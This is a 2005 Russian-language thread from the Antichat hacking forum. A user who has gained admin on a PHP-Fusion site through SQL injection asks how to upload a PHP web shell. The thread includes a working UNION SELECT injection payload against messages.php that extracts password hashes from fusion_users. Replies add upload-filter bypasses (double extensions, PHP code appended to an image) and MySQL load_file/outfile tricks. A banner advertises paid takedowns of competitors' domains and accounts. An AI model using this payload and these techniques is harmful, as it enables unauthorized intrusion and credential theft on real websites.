Форум АНТИЧАТ - Sql инъекция в движке php

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Sql инъекция в движке php_fusion

Опции темы

Поиск в этой теме

Опции просмотра

Sql инъекция в движке php_fusion

06.12.2005, 20:45

ilyha

Познающий

Регистрация: 10.11.2005

Сообщений: 75

Провел на форуме:
367531

Репутация: 4

Sql инъекция в движке php_fusion

Ну вообщем работает тема. Стал админом, а дальше, как php файл на сервер загрузить, через админ панель и функцию аплоада вайлов не получается, пишет, что формат не тот, загружает эта функция в папку downloads, а в ней содержатся, архивы, максимум изображения. Так как пхп туда запхнуть???
Заранее спасибо!!!

06.12.2005, 20:53

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

что значит "работает тема"?
Почему ты назвал тему "Sql инъекция в движке php_fusion".. и нигде про эту инъекцию не упоминаешь?! Гм.. а вопрос вообще спрашиваешь как туда залить шелл..

06.12.2005, 21:01

ilyha

Познающий

Регистрация: 10.11.2005

Сообщений: 75

Провел на форуме:
367531

Репутация: 4

messages.php?folder=inbox&show=H'%20union%20select %201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

Иньекция после "messages.php?folder=inbox&show=" - имеет место быть! Вообщем да, вопрос не в этом, а втом, как туда залить PHP файлик?

06.12.2005, 21:07

ghostwizard

Участник форума

Регистрация: 04.12.2005

Сообщений: 202

Провел на форуме:
414834

Репутация: 99

попробуй file.php.jpg, потом обратись usl/file.php.... но не факт что сработает из-за ограничения на исполнение в папке, так или иначе попробуй... если руганется на недопустимый тип файлов, то в руки hex-editor, добавляешь в конец *.jpg(gif,... etc) свой код и сохраняешь.

06.12.2005, 21:07

k1b0rg

Тут может быть ваша реклама.

Регистрация: 30.07.2005

Сообщений: 1,243

Провел на форуме:
4520553

Репутация: 1316

load_file
outfile

06.12.2005, 21:21

limpompo

Друг Клитора

Регистрация: 27.08.2005

Сообщений: 1,662

Провел на форуме:
6913553

Репутация: 1329

dams baga rulez...

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход